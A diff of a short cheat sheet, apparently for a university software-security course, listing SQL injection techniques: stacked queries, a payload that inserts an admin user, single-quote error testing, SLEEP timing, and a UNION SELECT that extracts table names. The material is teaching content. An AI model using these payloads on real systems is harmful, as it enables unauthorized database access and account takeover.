stanlrt/zhaw-sws-cheatsheet/boxedsheet.typ

   - Use ```sql ;``` to execute separate queries, only if server uses `executeBatch()`
   - Insert user: ```sql userpass'), ('admin', 'Superuser', 'adminpass')--```
   - *Testing*:
-    - Set password to single-quote ' and see if DB returns error
+    - Set password to single-quote ' and see if DB returns error.
+Inject `SLEEP`
     - *Getting table names*: ```sql SELECT * FROM user_data WHERE last_name = Smith' UNION SELECT 1,TABLE_NAME,3,4,5,6,7 FROM INFORMATION_SCHEMA.SYSTEM_TABLES--```
       1. We assume `user_data` has 7 columns, all `int` except the 2nd one which is `string`
       2. We set the `UNION` query so that all columns but the 2nd are string literals (arbitrary numbers)